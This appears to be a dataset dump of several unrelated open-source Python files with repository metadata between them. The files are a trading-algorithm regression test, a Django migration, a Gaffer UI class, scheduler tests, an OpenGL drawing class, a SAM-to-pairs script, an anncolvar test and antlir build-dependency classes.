            Symbol.CreateFuture(
                Futures.Indices.SP500EMini,
                Market.CME,
                datetime(2020, 3, 20)
            ),
            Resolution.Minute).Symbol
        # ES e-mini expiring June 2020.
        self.es19m20 = self.AddFutureContract(
            Symbol.CreateFuture(
                Futures.Indices.SP500EMini,
                Market.CME,
                datetime(2020, 6, 19)
            ),
            Resolution.Minute).Symbol
        # Select a future option expiring ITM, and adds it to the algorithm.
        self.esOptions = [
            self.AddFutureOptionContract(i, Resolution.Minute).Symbol for i in (self.OptionChainProvider.GetOptionContractList(self.es19m20, self.Time) + self.OptionChainProvider.GetOptionContractList(self.es20h20, self.Time)) if i.ID.StrikePrice == 3200.0 and i.ID.OptionRight == OptionRight.Call
        ]
        # The two contracts the chain filter above is expected to produce.
        self.expectedContracts = [
            Symbol.CreateOption(self.es20h20, Market.CME, OptionStyle.American, OptionRight.Call, 3200.0, datetime(2020, 3, 20)),
            Symbol.CreateOption(self.es19m20, Market.CME, OptionStyle.American, OptionRight.Call, 3200.0, datetime(2020, 6, 19))
        ]
        # Fail fast if the option chain did not contain the expected contracts.
        for esOption in self.esOptions:
            if esOption not in self.expectedContracts:
                raise AssertionError(f"Contract {esOption} was not found in the chain")
        # Enter the positions tomorrow at market open; flatten at noon.
        self.Schedule.On(self.DateRules.Tomorrow, self.TimeRules.AfterMarketOpen(self.es19m20, 1), self.ScheduleCallbackBuy)
        self.Schedule.On(self.DateRules.Tomorrow, self.TimeRules.Noon, self.ScheduleCallbackLiquidate)
    def ScheduleCallbackBuy(self):
        """Open the two option legs: long the first contract, short the second."""
        self.MarketOrder(self.esOptions[0], 1)
        self.MarketOrder(self.esOptions[1], -1)
    def ScheduleCallbackLiquidate(self):
        """Close every open position."""
        self.Liquidate()
    def OnEndOfAlgorithm(self):
        """Assert the regression invariant: no holdings remain at the end."""
        if self.Portfolio.Invested:
            raise AssertionError(f"Expected no holdings at end of algorithm, but are invested in: {', '.join([str(i.ID) for i in self.Portfolio.Keys])}")
| 44.206522
| 297
| 0.703221
|
4a0e9362beed4d61daebdf89b0fe1d4a6388d312
| 625
|
py
|
Python
|
hc/accounts/migrations/0009_auto_20180702_0510.py
|
andela/hc-wits-kla
|
ce14d6841c31b525ed8aec42b283ebe5db7cc3f8
|
[
"BSD-3-Clause"
] | null | null | null |
hc/accounts/migrations/0009_auto_20180702_0510.py
|
andela/hc-wits-kla
|
ce14d6841c31b525ed8aec42b283ebe5db7cc3f8
|
[
"BSD-3-Clause"
] | 33
|
2018-06-21T06:05:39.000Z
|
2021-12-13T19:47:43.000Z
|
hc/accounts/migrations/0009_auto_20180702_0510.py
|
andela/hc-wits-kla
|
ce14d6841c31b525ed8aec42b283ebe5db7cc3f8
|
[
"BSD-3-Clause"
] | 2
|
2018-07-12T18:18:09.000Z
|
2021-12-22T11:21:19.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2018-07-02 05:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Replaces Member.assigned_job with a many-to-many relation to api.Check
    # (RemoveField + AddField, since the field type changes).
    dependencies = [
        ('api', '0026_auto_20160415_1824'),
        ('accounts', '0008_auto_20180630_1451'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='member',
            name='assigned_job',
        ),
        migrations.AddField(
            model_name='member',
            name='assigned_job',
            # NOTE(review): null=True has no effect on ManyToManyField (Django
            # ignores it); left as-is because editing an applied migration
            # would change migration history - confirm before cleaning up.
            field=models.ManyToManyField(null=True, to='api.Check'),
        ),
    ]
| 24.038462
| 68
| 0.5968
|
4a0e93c30d799b1ef207d5cddfd8796f4cb62ee8
| 3,805
|
py
|
Python
|
python/GafferUI/NodeUI.py
|
cwmartin/gaffer
|
1f8a0f75522105c9d5efefac6d55cb61c1038909
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferUI/NodeUI.py
|
cwmartin/gaffer
|
1f8a0f75522105c9d5efefac6d55cb61c1038909
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferUI/NodeUI.py
|
cwmartin/gaffer
|
1f8a0f75522105c9d5efefac6d55cb61c1038909
|
[
"BSD-3-Clause"
] | null | null | null |
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import re
import fnmatch
import IECore
import Gaffer
import GafferUI
## This class forms the base class for all uis for nodes.
class NodeUI( GafferUI.Widget ) :
	def __init__( self, node, topLevelWidget, **kw ) :
		GafferUI.Widget.__init__( self, topLevelWidget, **kw )
		self.__node = node
		self.__readOnly = False
	## Returns the node the ui represents.
	def node( self ) :
		return self.__node
	## Should be implemented by derived classes to return
	# a PlugValueWidget they are using to represent the
	# specified plug. Since many UIs are built lazily on
	# demand, this may return None unless lazy=False is
	# passed to force creation of parts of the UI that
	# otherwise are not yet visible to the user.
	def plugValueWidget( self, plug, lazy=True ) :
		# Base implementation: no widget. Subclasses override.
		return None
	## Can be called to make the UI read only - must
	# be implemented appropriately by derived classes.
	def setReadOnly( self, readOnly ) :
		assert( isinstance( readOnly, bool ) )
		self.__readOnly = readOnly
	## Returns the current read-only flag set by setReadOnly().
	def getReadOnly( self ) :
		return self.__readOnly
	## Creates a NodeUI instance for the specified node.
	# Searches the node's type and then its base types for a
	# registered UI creator, most-derived first.
	@classmethod
	def create( cls, node ) :
		nodeHierarchy = IECore.RunTimeTyped.baseTypeIds( node.typeId() )
		for typeId in [ node.typeId() ] + nodeHierarchy :
			nodeUI = cls.__nodeUIs.get( typeId, None )
			if nodeUI is not None :
				return nodeUI( node )
		# NOTE(review): reaching here means no UI is registered for any base
		# type - this asserts rather than raising a descriptive error.
		assert( 0 )
	# Registry mapping node type id -> UI creator callable.
	__nodeUIs = {}
	## Registers a subclass of NodeUI to be used with a specific node type.
	@classmethod
	def registerNodeUI( cls, nodeClassOrTypeId, nodeUICreator ) :
		assert( callable( nodeUICreator ) )
		# Accept either a class (use its static type id) or a raw type id.
		if isinstance( nodeClassOrTypeId, IECore.TypeId ) :
			nodeTypeId = nodeClassOrTypeId
		else :
			nodeTypeId = nodeClassOrTypeId.staticTypeId()
		cls.__nodeUIs[nodeTypeId] = nodeUICreator
# Hide the "user" plug's nodule and file it under the "User" UI section.
GafferUI.Nodule.registerNodule( Gaffer.Node, "user", lambda plug : None )
Gaffer.Metadata.registerPlugValue( Gaffer.Node, "user", "nodeUI:section", "User" )
| 34.279279
| 82
| 0.705388
|
4a0e942b39392b31e2e99d0b97c0b65ea97a60a2
| 8,214
|
py
|
Python
|
test/test_scheduler.py
|
skybrush-io/flockwave-async
|
242055f551966dde9b035ff87ed10ed52f6cdf26
|
[
"MIT"
] | null | null | null |
test/test_scheduler.py
|
skybrush-io/flockwave-async
|
242055f551966dde9b035ff87ed10ed52f6cdf26
|
[
"MIT"
] | null | null | null |
test/test_scheduler.py
|
skybrush-io/flockwave-async
|
242055f551966dde9b035ff87ed10ed52f6cdf26
|
[
"MIT"
] | null | null | null |
from pytest import deprecated_call, raises
from time import time
from trio import sleep
from typing import Optional
from flockwave.concurrency.scheduler import JobCancelled, LateSubmissionError, Scheduler
class Task:
    """Awaitable test helper: sleeps one second, then returns a result or raises.

    Records whether it was ever awaited in ``called``.
    """

    def __init__(self, result: int = 0, *, error: Optional[str] = None):
        self._result = result
        self._error = error
        self.called = False

    async def __call__(self) -> int:
        self.called = True
        await sleep(1)
        if self._error is None:
            return self._result
        raise RuntimeError(self._error)
async def test_scheduler_single_job(nursery, autojump_clock):
    """A job scheduled 5s out starts at t=5 and completes at t=6 (Task sleeps 1s)."""
    scheduler = Scheduler()
    await nursery.start(scheduler.run)
    task = Task(42)
    job = scheduler.schedule_after(5, task)
    assert job.outcome is None
    assert not job.running and not job.completed
    await sleep(1)
    assert job.outcome is None
    assert not job.running and not job.completed
    await sleep(4.1)
    # t = 5.1: the job has started but has not finished yet.
    assert job.outcome is None
    assert job.running and not job.completed
    assert 42 == await job.wait()
    assert not job.running and job.completed
async def test_scheduler_single_job_wait_twice(nursery, autojump_clock):
    """wait() can be awaited repeatedly and keeps returning the same outcome."""
    scheduler = Scheduler()
    await nursery.start(scheduler.run)
    task = Task(42)
    job = scheduler.schedule_after(5, task)
    assert 42 == await job.wait()
    assert 42 == await job.wait()
async def test_scheduler_single_job_throwing_error(nursery, autojump_clock):
    """An exception raised inside the task propagates out of wait()."""
    scheduler = Scheduler()
    await nursery.start(scheduler.run)
    task = Task(error="foo")
    job = scheduler.schedule_after(5, task)
    with raises(RuntimeError, match="foo"):
        await job.wait()
    assert not job.running and job.completed
async def test_scheduler_does_not_crash_when_job_crashes(nursery, autojump_clock):
    """A crashing job does not take down the scheduler; later jobs still run."""
    scheduler = Scheduler()
    await nursery.start(scheduler.run)
    task = Task(error="foo")
    scheduler.schedule_after(5, task)
    task2 = Task(42)
    job = scheduler.schedule_after(7, task2)
    await sleep(9)
    assert not job.running and job.completed
    assert 42 == await job.wait()
async def test_scheduler_multiple_jobs(nursery, autojump_clock):
    """Three jobs (t=3, t=5, t=5.5) run and complete in the expected order."""
    scheduler = Scheduler()
    job = scheduler.schedule_after(3, Task(1))
    job2 = scheduler.schedule_at(time() + 5, Task(error="bar"))
    await nursery.start(scheduler.run)
    job3 = scheduler.schedule_after(5.5, Task(3))
    jobs = [job, job2, job3]
    assert not any(job.running or job.completed for job in jobs)
    await sleep(2)
    assert not any(job.running or job.completed for job in jobs)
    await sleep(1.1)
    # t = 3.1: only the first job has started.
    assert job.running and not job.completed
    assert not job2.running and not job2.completed
    assert not job3.running and not job3.completed
    await sleep(1)
    assert not job.running and job.completed
    assert 1 == await job.wait()
    assert not job2.running and not job2.completed
    assert not job3.running and not job3.completed
    await sleep(1)
    # t = 5.1: second job running, third still pending.
    assert not job.running and job.completed
    assert job2.running and not job2.completed
    assert not job3.running and not job3.completed
    await sleep(0.5)
    assert not job.running and job.completed
    assert job2.running and not job2.completed
    assert job3.running and not job3.completed
    with raises(RuntimeError, match="bar"):
        await job2.wait()
    assert not job.running and job.completed
    assert not job2.running and job2.completed
    assert job3.running and not job3.completed
    await sleep(0.51)
    assert all(not job.running and job.completed for job in jobs)
    assert 3 == await job3.wait()
async def test_job_cancellation(nursery, autojump_clock):
    """Cancelling before start marks the job completed; wait() raises JobCancelled."""
    scheduler = Scheduler()
    job = scheduler.schedule_after(3, Task(1))
    await nursery.start(scheduler.run)
    await sleep(1)
    scheduler.cancel(job)
    assert not job.running and job.completed
    with raises(JobCancelled):
        await job.wait()
async def test_job_cancellation_when_running(nursery, autojump_clock):
    """Cancelling a job while it is already running also yields JobCancelled."""
    scheduler = Scheduler()
    job = scheduler.schedule_after(3, Task(1))
    await nursery.start(scheduler.run)
    await sleep(3.5)
    scheduler.cancel(job)
    assert not job.running and job.completed
    with raises(JobCancelled):
        await job.wait()
async def test_job_rescheduling(nursery, autojump_clock):
    """Jobs can be rescheduled (earlier or later) before start, but not after."""
    scheduler = Scheduler()
    job = scheduler.schedule_after(3, Task(1))
    job2 = scheduler.schedule_after(5, Task(2))
    job3 = scheduler.schedule_after(7, Task(3))
    await nursery.start(scheduler.run)
    await sleep(0.5)
    # Pull job2 forward to t = 1.0.
    scheduler.reschedule_after(0.5, job2)
    assert not job2.running and not job2.completed
    await sleep(0.6)
    assert job2.running and not job2.completed
    await sleep(1)
    assert not job2.running and job2.completed
    assert 2 == await job2.wait()
    # Push job past job3's start time.
    scheduler.reschedule_to(time() + 7.9, job)
    assert 3 == await job3.wait()
    assert not job.running and not job.completed
    await sleep(2.1)
    assert job.running and not job.completed
    await sleep(1)
    assert not job.running and job.completed
    assert 1 == await job.wait()
    # Rescheduling after the job started must be rejected.
    job4 = scheduler.schedule_after(1, Task(4))
    await sleep(1.5)
    with raises(RuntimeError, match="started already"):
        scheduler.reschedule_after(1, job4)
    job5 = scheduler.schedule_at(time() + 0.1, Task(4))
    await sleep(0.6)
    with raises(RuntimeError, match="started already"):
        scheduler.reschedule_to(time() + 1, job5)
async def test_job_running_twice(nursery, autojump_clock):
    """_run() refuses to execute a job that already finished or is running."""
    scheduler = Scheduler()
    await nursery.start(scheduler.run)
    job = scheduler.schedule_after(3, Task(1))
    assert 1 == await job.wait()
    with raises(RuntimeError, match="already executed"):
        await job._run()
    job = scheduler.schedule_after(3, Task(1))
    await sleep(3.5)
    with raises(RuntimeError, match="running"):
        await job._run()
async def test_job_late_cancellation(nursery, autojump_clock):
    """Cancelling an already-completed job is a no-op; the outcome is kept."""
    scheduler = Scheduler()
    await nursery.start(scheduler.run)
    job = scheduler.schedule_after(3, Task(1))
    assert 1 == await job.wait()
    scheduler.cancel(job)
    assert 1 == await job.wait()
async def test_job_late_submission():
    """allow_late_start (default True) gates scheduling jobs in the past."""
    scheduler = Scheduler()
    assert scheduler.allow_late_start
    scheduler = Scheduler(allow_late_start=False)
    assert not scheduler.allow_late_start
    scheduler = Scheduler(allow_late_start=True)
    assert scheduler.allow_late_start
    # This should be OK
    scheduler.schedule_after(-3, Task(1))
    # This is not OK
    scheduler.allow_late_start = False
    with raises(LateSubmissionError):
        scheduler.schedule_after(-3, Task(1))
async def test_job_late_submission_override():
    """The per-job allow_late_start argument overrides the scheduler default."""
    scheduler = Scheduler(allow_late_start=False)
    # This should be OK because we override the scheduler
    scheduler.schedule_after(-3, Task(1), allow_late_start=True)
    # This is not OK
    with raises(LateSubmissionError):
        scheduler.schedule_after(-3, Task(1))
    # This should be OK because we override the scheduler
    scheduler.schedule_at(time() - 2, Task(1), allow_late_start=True)
    # This is not OK
    with raises(LateSubmissionError):
        scheduler.schedule_at(time() - 2, Task(1))
async def test_job_rescheduling_to_past(nursery, autojump_clock):
    """A rejected reschedule-to-the-past keeps the original start time intact."""
    scheduler = Scheduler(allow_late_start=False)
    job = scheduler.schedule_after(3, Task(1))
    await nursery.start(scheduler.run)
    with raises(LateSubmissionError):
        scheduler.reschedule_after(-3, job)
    # Failed rescheduling should keep the start time intact
    assert not job.running and not job.completed
    await sleep(3.1)
    assert job.running and not job.completed
    assert 1 == await job.wait()
async def test_deprecated_constructor_args():
    """The legacy allow_late_submissions kwarg still works but warns; unknown
    kwargs raise TypeError."""
    with deprecated_call():
        scheduler = Scheduler(True, allow_late_submissions=False)
    assert not scheduler.allow_late_start
    with deprecated_call():
        scheduler = Scheduler(False, allow_late_submissions=True)
    assert scheduler.allow_late_start
    with raises(TypeError, match="unexpected keyword argument: 'foo'"):
        scheduler = Scheduler(foo="bar")
| 28.620209
| 88
| 0.704407
|
4a0e942e203d7f01921c7653bdde96c6978035bd
| 323
|
py
|
Python
|
src/boot.py
|
overdone/climate_control
|
932db9a7d22322042c5fb8b2a8afebea4e197c2c
|
[
"MIT"
] | null | null | null |
src/boot.py
|
overdone/climate_control
|
932db9a7d22322042c5fb8b2a8afebea4e197c2c
|
[
"MIT"
] | null | null | null |
src/boot.py
|
overdone/climate_control
|
932db9a7d22322042c5fb8b2a8afebea4e197c2c
|
[
"MIT"
] | null | null | null |
import network
import gc
import settings
# Reclaim memory freed during import before bringing up the network.
gc.collect()
def do_wifi_connect():
sta_if = network.WLAN(network.STA_IF)
if not sta_if.isconnected():
sta_if.active(True)
sta_if.connect(settings.WIFI_SID, settings.WIFI_PASS)
while not sta_if.isconnected():
pass
do_wifi_connect()
| 17
| 61
| 0.681115
|
4a0e95186e815e34d814047ed69c171c3f52252b
| 2,750
|
py
|
Python
|
camviz/objects/object.py
|
TRI-ML/camviz
|
ba1d8b92dff2ae01616c999739eca3e507434f4f
|
[
"MIT"
] | 30
|
2021-12-13T21:26:22.000Z
|
2022-03-15T16:11:59.000Z
|
camviz/objects/object.py
|
TRI-ML/camviz
|
ba1d8b92dff2ae01616c999739eca3e507434f4f
|
[
"MIT"
] | 4
|
2021-12-14T15:23:51.000Z
|
2022-02-17T07:51:59.000Z
|
camviz/objects/object.py
|
TRI-ML/camviz
|
ba1d8b92dff2ae01616c999739eca3e507434f4f
|
[
"MIT"
] | 1
|
2021-12-23T07:38:30.000Z
|
2021-12-23T07:38:30.000Z
|
# Copyright 2021 Toyota Research Institute. All rights reserved.
from OpenGL.GL import *
from camviz.objects.pose import Pose
class Object:
"""
Base object draw class
Parameters
----------
scale : float
Scale used when drawing the object
pose : np.array
Object pose
"""
def __init__(self, scale=1.0, pose=None):
self.scale = scale
self.pose = pose if isinstance(pose, Pose) else Pose(pose)
@property
def t(self):
"""Return pose translation"""
return self.pose.t
@property
def R(self):
"""Return pose rotation"""
return self.pose.R
@property
def T(self):
"""Return pose transformation"""
return self.pose.T
@property
def Rt(self):
"""Return pose rotation transposed"""
return self.pose.Rt
@property
def Tt(self):
"""Return pose transformation transposed"""
return self.pose.Tt
def translateX(self, m):
"""Translate object in X by m"""
return self.pose.translateX(m)
def translateY(self, m):
"""Translate object in Y by m"""
return self.pose.translateY(m)
def translateZ(self, m):
"""Translate object in Z by m"""
return self.pose.translateZ(m)
def rotateX(self, d):
"""Rotate object in X by d degrees"""
return self.pose.rotateX(d)
def rotateY(self, d):
"""Rotate object in Y by d degrees"""
return self.pose.rotateY(d)
def rotateZ(self, d):
"""Rotate object in Z by d degrees"""
return self.pose.rotateZ(d)
def rotateI(self, d):
"""Rotate object in X by d degrees (from the camera's perspective)"""
return self.pose.rotateI(d)
def rotateJ(self, d):
"""Rotate object in Y by d degrees (from the camera's perspective)"""
return self.pose.rotateJ(d)
def rotateK(self, d):
"""Rotate object in Z by d degrees (from the camera's perspective)"""
return self.pose.rotateK(d)
def setPose(self, pose):
"""Set object pose"""
return self.pose.setPose(pose)
def display(self, *args, align=None, **kwargs):
"""
Display object
Parameters
----------
args : args
Extra draw arguments
align : camviz.Pose
Pose used to align the object
kwargs : kwargs
Extra draw arguments
"""
# Get transformation (aligned or not)
if align is not None:
T = (align @ self.pose).Tt
else:
T = self.Tt
# Draw object
glPushMatrix()
glMultMatrixf(T)
self.draw(*args, **kwargs)
glPopMatrix()
| 24.553571
| 77
| 0.566182
|
4a0e952aa1a65f16885e00e613c8c65ae3d69087
| 828
|
py
|
Python
|
ASLServerDjango/mysite/polls/migrations/0021_news.py
|
Plusers/ASLServerDjango
|
da03aa6ec53e1f72d320e94ecabba1569c5e9a75
|
[
"MIT"
] | 1
|
2019-10-11T20:14:18.000Z
|
2019-10-11T20:14:18.000Z
|
ASLServerDjango/mysite/polls/migrations/0021_news.py
|
Plusers/ASLServerDjango
|
da03aa6ec53e1f72d320e94ecabba1569c5e9a75
|
[
"MIT"
] | null | null | null |
ASLServerDjango/mysite/polls/migrations/0021_news.py
|
Plusers/ASLServerDjango
|
da03aa6ec53e1f72d320e94ecabba1569c5e9a75
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2019-03-26 20:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0020_auto_20190326_2002'),
]
operations = [
migrations.CreateModel(
name='News',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, null=True, verbose_name='Заголовок новости')),
('text_of_news', models.CharField(max_length=200, null=True, verbose_name='Текс новости')),
('data_pub', models.DateField(null=True, verbose_name='Дата публикации новости')),
],
),
]
| 33.12
| 114
| 0.619565
|
4a0e956c96bf4e207e82f09a26612b707aa60355
| 1,573
|
py
|
Python
|
fitshelper/utils.py
|
philrosenfield/fitshelper
|
492e5b533fbe4069efbf0849fa6cf71fee76abcd
|
[
"MIT"
] | null | null | null |
fitshelper/utils.py
|
philrosenfield/fitshelper
|
492e5b533fbe4069efbf0849fa6cf71fee76abcd
|
[
"MIT"
] | null | null | null |
fitshelper/utils.py
|
philrosenfield/fitshelper
|
492e5b533fbe4069efbf0849fa6cf71fee76abcd
|
[
"MIT"
] | null | null | null |
"""Common Utilities"""
def replace_all(text, dic):
"""perfrom text.replace(key, value) for all keys and values in dic"""
for old, new in dic.items():
text = text.replace(old, new)
return text
def center_from_simbad(target):
"""Query Simbad for the coordinates of a target."""
from astroquery.simbad import Simbad
import astropy.units as u
from astropy.coordinates import SkyCoord
def sstr(attr):
"""
Strip the value from a simbad table string
e.g.
>>> str(q['RA'])
>>> ' RA \n "h:m:s" \n------------\n04 52 25.040'
>>> sstr(q['RA'])
>>> '04 52 25.040'
"""
return str(attr).split('\n')[-1]
qry = Simbad.query_object(target)
if qry is None:
print('Error, can not query simbad for {}'.format(target))
return np.nan, np.nan
radec = SkyCoord(ra=sstr(qry['RA']), dec=sstr(qry['DEC']),
unit=(u.hourangle, u.deg))
return radec.ra.value, radec.dec.value
def fixnames(data, namecol='SimbadName', repd=None, strrep='NONAME'):
"""
Mark empty names with strrep instead of nan.
Remove spaces and "Cl" and [] (default, or pass a dictionary replacement)
"""
repd = None or {' ': '', '[': '', ']': '', 'Cl': ''}
for i in range(len(data[namecol])):
try:
float(data.loc[i][namecol])
data[namecol].iloc[i] = 'NONAME'
except:
pass
names = [replace_all(l, repd) for l in data[namecol]]
data[namecol] = names
return data
| 28.6
| 77
| 0.557533
|
4a0e96904a2add41f4e0306c9d32af89a677aea9
| 1,193
|
py
|
Python
|
tests/test_it.py
|
ljocha/anncolvar
|
44daeba1d21b6b7225e8ba6d097245a97f6c8a43
|
[
"MIT"
] | 8
|
2018-07-17T09:50:13.000Z
|
2021-12-25T07:20:00.000Z
|
tests/test_it.py
|
ljocha/anncolvar
|
44daeba1d21b6b7225e8ba6d097245a97f6c8a43
|
[
"MIT"
] | 6
|
2018-11-27T12:44:28.000Z
|
2021-10-10T19:22:59.000Z
|
tests/test_it.py
|
ljocha/anncolvar
|
44daeba1d21b6b7225e8ba6d097245a97f6c8a43
|
[
"MIT"
] | 7
|
2018-11-15T01:08:33.000Z
|
2021-12-10T15:53:19.000Z
|
import pytest
import mdtraj as md
import numpy as np
import keras as krs
import argparse as arg
import datetime as dt
import sys
import os
import anncolvar
def test_it():
myinfilename = os.path.join(os.path.dirname(__file__), 'traj_fit.xtc')
myintopname = os.path.join(os.path.dirname(__file__), 'reference.pdb')
mycolvarname = os.path.join(os.path.dirname(__file__), 'results_isomap')
ae, cor = anncolvar.anncollectivevariable(infilename=myinfilename,
intopname=myintopname,
colvarname=mycolvarname,
column=2, boxx=1.0, boxy=1.0, boxz=1.0,
atestset=0.1, shuffle=1, nofit=0, layers=3, layer1=16, layer2=8, layer3=4,
actfun1='sigmoid', actfun2='sigmoid', actfun3='sigmoid',
optim='adam', loss='mean_squared_error', epochs=1000, batch=256,
ofilename='', modelfile='', plumedfile='', plumedfile2='')
assert(cor > 0.99)
if __name__ == '__main__':
pytest.main([__file__])
| 38.483871
| 118
| 0.551551
|
4a0e96fb4395cc528d2c790b1d05dfd13086d041
| 561
|
py
|
Python
|
bin/sam2pairs.py
|
PavriLab/hicer-nf
|
ec726f48511aaa4797743103fa24b4db5a7aeefa
|
[
"MIT"
] | null | null | null |
bin/sam2pairs.py
|
PavriLab/hicer-nf
|
ec726f48511aaa4797743103fa24b4db5a7aeefa
|
[
"MIT"
] | 2
|
2021-01-14T13:01:17.000Z
|
2021-09-27T13:43:58.000Z
|
bin/sam2pairs.py
|
PavriLab/hicer-nf
|
ec726f48511aaa4797743103fa24b4db5a7aeefa
|
[
"MIT"
] | 1
|
2021-01-20T17:07:22.000Z
|
2021-01-20T17:07:22.000Z
|
#!/usr/bin/env python
import argparse as ap
import pysam as ps
import logging
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
parser = ap.ArgumentParser()
parser.add_argument('pairedSam',
help = 'paired SAM file')
args = parser.parse_args()
with ps.AlignmentFile(args.pairedSam, 'r') as sam:
for read in sam:
print(read.query_name.replace('#', '$'),
read.reference_name,
read.reference_start + 1,
'-' if read.is_reverse else '+',
sep = '\t')
| 28.05
| 75
| 0.607843
|
4a0e97b414fec292cca9421462383c229d53a947
| 5,403
|
py
|
Python
|
antlir/compiler/requires_provides.py
|
facebookincubator/fs_image
|
3515a24bb0e93176a5584bdc8839464fa28390d7
|
[
"MIT"
] | 9
|
2019-12-02T20:17:35.000Z
|
2020-06-13T16:34:25.000Z
|
antlir/compiler/requires_provides.py
|
facebookincubator/fs_image
|
3515a24bb0e93176a5584bdc8839464fa28390d7
|
[
"MIT"
] | 19
|
2019-11-22T23:30:04.000Z
|
2020-07-16T18:05:48.000Z
|
antlir/compiler/requires_provides.py
|
facebookincubator/fs_image
|
3515a24bb0e93176a5584bdc8839464fa28390d7
|
[
"MIT"
] | 4
|
2019-12-04T19:03:28.000Z
|
2020-06-13T16:34:29.000Z
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
'''
Images are composed of a bunch of Items. These are declared by the user
in an order-independent fashion, but they have to be installed in a specific
order. For example, we can only copy a file into a directory after the
directory already exists.
The main jobs of the image compiler are:
- to validate that the specified Items will work well together, and
- to install them in the appropriate order.
To do these jobs, each Item Provides certain filesystem features --
described in this file -- and also Requires certain predicates about
filesystem features -- described in `requires.py`.
Requires and Provides must interact in some way -- either
(1) Provides objects need to know when they satisfy each requirements, or
(2) Requires objects must know all the Provides that satisfy them.
The first arrangement seemed more maintainable, so each Provides object has
to define its relationship with every Requires predicate, thus:
def matches(self, path_to_reqs_provs, predicate):
"""
`path_to_reqs_provs` is the map constructed by `ValidatedReqsProvs`.
This is a breadcrumb for the future -- having the full set of
"provides" objects will let us resolve symlinks.
"""
return True or False
Future: we might want to add permissions constraints, tackle following
symlinks (or not following them), maybe hardlinks, etc. This would
likely best be tackled via predicate composition with And/Or/Not support
with short-circuiting. E.g. FollowsSymlinks(Pred) would expand to:
Or(
And(IsSymlink(Path), Pred(SymlinkTarget(Path))),
And(Not(IsSymlink(Path)), Pred(SymlinkTarget(Path)),
)
'''
import dataclasses
from enum import Enum, auto
from antlir.fs_utils import Path
class RequirementKind(Enum):
PATH = auto()
GROUP = auto()
USER = auto()
@dataclasses.dataclass(frozen=True)
class Requirement:
kind: RequirementKind
def _normalize_path(path: Path) -> Path:
# Normalize paths as image-absolute. This is crucial since we
# will use `path` as a dictionary key.
return Path(b"/" / path.strip_leading_slashes()).normpath()
@dataclasses.dataclass(frozen=True)
# pyre-fixme[13]: Attribute `path` is never initialized.
class RequirePath(Requirement):
path: Path
def __init__(self, path: Path) -> None:
super().__init__(kind=RequirementKind.PATH)
object.__setattr__(self, "path", _normalize_path(path))
class RequireDirectory(RequirePath):
pass
class RequireFile(RequirePath):
pass
class _RequireDoNotAccess(RequirePath):
# Only ProvidesDoNotAccess should instantiate this type of RequirePath and
# it is meant to fail compilation if a RequireDirectory or RequireFile is
# requested at this path.
pass
@dataclasses.dataclass(frozen=True)
# pyre-fixme[13]: Attribute `target` is never initialized.
class RequireSymlink(RequirePath):
target: Path
def __init__(self, path: Path, target: Path) -> None:
super().__init__(path=path)
object.__setattr__(self, "target", target)
@dataclasses.dataclass(frozen=True)
# pyre-fixme[13]: Attribute `name` is never initialized.
class RequireGroup(Requirement):
name: str
def __init__(self, name: str) -> None:
super().__init__(kind=RequirementKind.GROUP)
object.__setattr__(self, "name", name)
@dataclasses.dataclass(frozen=True)
# pyre-fixme[13]: Attribute `name` is never initialized.
class RequireUser(Requirement):
name: str
def __init__(self, name: str) -> None:
super().__init__(kind=RequirementKind.USER)
object.__setattr__(self, "name", name)
@dataclasses.dataclass(frozen=True)
class Provider:
req: Requirement
def provides(self, req: Requirement) -> bool:
return self.req == req
@dataclasses.dataclass(frozen=True)
class ProvidesPath(Provider):
req: RequirePath
def path(self) -> Path:
return self.req.path
def with_new_path(self, new_path: Path) -> "ProvidesPath":
# pyre-fixme[6]: Expected `RequirePath` for 1st param but got `Path`.
return self.__class__(new_path)
class ProvidesDirectory(ProvidesPath):
def __init__(self, path: Path) -> None:
super().__init__(req=RequireDirectory(path=path))
class ProvidesFile(ProvidesPath):
"Does not have to be a regular file, just any leaf in the FS tree"
def __init__(self, path: Path) -> None:
super().__init__(req=RequireFile(path=path))
class ProvidesSymlink(ProvidesPath):
def __init__(self, path: Path, target: Path) -> None:
super().__init__(req=RequireSymlink(path, target))
